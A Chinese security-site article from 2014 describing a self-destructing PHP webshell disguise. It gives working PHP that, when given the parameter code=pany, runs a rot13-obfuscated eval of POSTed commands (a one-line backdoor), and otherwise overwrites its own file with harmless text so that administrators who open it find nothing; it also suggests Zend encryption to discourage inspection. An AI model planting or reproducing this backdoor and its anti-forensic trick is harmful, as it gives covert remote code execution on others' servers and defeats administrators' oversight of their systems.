关于冰盾 | 使用条款 | 网站地图
 
自毁的PHP文件—脚本木马伪装思路
自毁的PHP文件—脚本木马伪装思路
作者:冰盾防火墙 网站:www.bingdun.com 日期:2014-10-16
 

首先用zend把代码加密起来。

一般情况下,遇到陌生的php都会打开看看,一看是zend就会在浏览器访问下,这样的话,直接往当前文件写入一个正常的文字不会被维护人员发觉!!

01 <?
02 if($_REQUEST["code"]==pany){
03 eval(str_rot13('riny($_CBFG[pzq]);'));
04 }
05 else{
06 $url = $_SERVER['PHP_SELF'];
07 $filename = end(explode('/',$url));
08  
09 $content = 'helloworld';
10 $fp = fopen ("$filename","w");
11     if (fwrite ($fp, $content)){
12         fclose ($fp);
13         die ("error");
14     } else {
15         fclose ($fp);
16         die ("good");
17     }
18 exit;
19 }
20 ?>


自己访问的时候http://127.0.0.1/1.php?code=pany时,执行的是

if($_REQUEST["code"]==pany){
eval(str_rot13('riny($_CBFG[pzq]);'));
}  

红色框框里面的内容,在这里我填写的是一句话木马,你可以换成其他内容。

管理员直接访问http://127.0.0.1/1.php,则会出现

QQ截图20131216141914.png

此时源代码变成

QQ截图20131216141954.png

 

 

思路来自乌云社区的juuxdd。
 
 
最新内容:
著名黑客设计全球首款硬件开源笔记本即将问世[2014-10-16]
全国昨日大面积网络“瘫痪”专家:或遭黑客攻击[2014-10-16]
百度手机卫士号召全民通缉吸费应用赏金达1000万[2014-10-16]
渗透测试专用版Linux:BackBox3.13发布[2014-10-16]
思科:Java成2013年网络攻击最大元凶[2014-10-16]
“电视病毒”来了!电视中招厂家不保修[2014-10-16]
相关内容:

合作伙伴: 黑基网 补天科技 威盾科技 站长下载 新飞金信 北京电信 ZOL应用下载
中华人民共和国增值电信业务经营许可证京ICP备14024464 公安备案号 京1081234 
版权所有©2003-2014 冰盾防火墙  www.BingDun.com 法律声明
总机:(010)51661195